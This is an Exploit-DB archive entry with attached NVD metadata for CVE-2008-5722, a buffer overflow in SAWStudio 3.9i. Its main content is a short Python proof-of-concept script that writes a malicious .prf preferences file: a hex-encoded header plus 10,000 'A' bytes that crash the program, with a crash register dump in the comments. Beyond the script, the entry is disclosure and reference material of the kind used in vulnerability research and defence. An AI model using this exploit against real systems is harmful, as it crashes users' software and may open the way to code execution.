ID EDB-ID:7578
Type exploitdb
Reporter Encrypt3d.M!nd
Modified 2008-12-24T00:00:00
Description
SAWStudio 3.9i (prf File) Local Buffer Overflow PoC. CVE-2008-5722. Dos exploit for windows platform
# SAWStudio 3.9i (prf file) Buffer overflow Poc
# By:Encrypt3d.M!nd
#
# Greetz:-=Mizo=-,L!0N,El Mariachi,MiNi SpIder,GGY,and all my friends
#####################################################################
#
# when you import Prefernces File "prf file" contain long characters
# an overflow will occure,and the registers will be just like this:
#
#
# EAX:41414141 ECX:00000000 EDX:00561498 EBX:00000000
# ESP:0012DA5C EBP:0012FAD0 ESI:00561498 EDI:00000000
# EIP:7C91B1FA ntdll.7C91B1FA
#
# Access violation when writing to[41414151]
#
# Tested on: Windows XP SP3
#####################################################################
l337 = ("\x53\x41\x57\x53\x54\x55\x44\x49\x4F\x20\x50\x52\x45\x46\x45\x52\x45\x4E\x43\x45\x53\x20\x53\x54\x52\x55\x43\x54\x20\x20\x20\x20\x20")
pl = "A"*10000
file=open('enc.prf','w+')
file.write(l337+pl)
file.close()
# milw0rm.com [2008-12-24]
{"id": "EDB-ID:7578", "type": "exploitdb", "bulletinFamily": "exploit", "title": "SAWStudio 3.9i prf File Local Buffer Overflow PoC", "description": "SAWStudio 3.9i (prf File) Local Buffer Overflow PoC. CVE-2008-5722. Dos exploit for windows platform", "published": "2008-12-24T00:00:00", "modified": "2008-12-24T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/7578/", "reporter": "Encrypt3d.M!nd ", "references": [], "cvelist": ["CVE-2008-5722"], "lastseen": "2016-02-01T03:32:00", "viewCount": 4, "enchantments": {"score": {"value": 7.8, "vector": "NONE", "modified": "2016-02-01T03:32:00", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-5722"]}], "modified": "2016-02-01T03:32:00", "rev": 2}, "vulnersScore": 7.8}, "sourceHref": "https://www.exploit-db.com/download/7578/", "sourceData": "# SAWStudio 3.9i (prf file) Buffer overflow Poc\n# By:Encrypt3d.M!nd\n#\n# Greetz:-=Mizo=-,L!0N,El Mariachi,MiNi SpIder,GGY,and all my friends\n#####################################################################\n#\n# when you import Prefernces File \"prf file\" contain long characters\n# an overflow will occure,and the registers will be just like this:\n#\n#\n# EAX:41414141 ECX:00000000 EDX:00561498 EBX:00000000\n# ESP:0012DA5C EBP:0012FAD0 ESI:00561498 EDI:00000000\n# EIP:7C91B1FA ntdll.7C91B1FA\n#\n# Access violation when writing to[41414151]\n#\n# Tested on: Windows XP SP3\n#####################################################################\n\n\n\nl337 = (\"\\x53\\x41\\x57\\x53\\x54\\x55\\x44\\x49\\x4F\\x20\\x50\\x52\\x45\\x46\\x45\\x52\\x45\\x4E\\x43\\x45\\x53\\x20\\x53\\x54\\x52\\x55\\x43\\x54\\x20\\x20\\x20\\x20\\x20\")\n\npl = \"A\"*10000\n\nfile=open('enc.prf','w+')\nfile.write(l337+pl)\nfile.close()\n\n# milw0rm.com [2008-12-24]\n", "osvdbidlist": ["51025"]}
{"cve": [{"lastseen": "2020-10-03T11:51:04", "description": "Buffer overflow in SAWStudio 3.9i allows user-assisted remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a long SAWSTUDIO PREFERENCES STRUCT value in a .prf (preferences) file.", "edition": 3, "cvss3": {}, "published": "2008-12-26T17:30:00", "title": "CVE-2008-5722", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5722"], "modified": "2017-09-29T01:32:00", "cpe": ["cpe:/a:sawstudio:sawstudio:3.9i"], "id": "CVE-2008-5722", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5722", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:sawstudio:sawstudio:3.9i:*:*:*:*:*:*:*"]}]}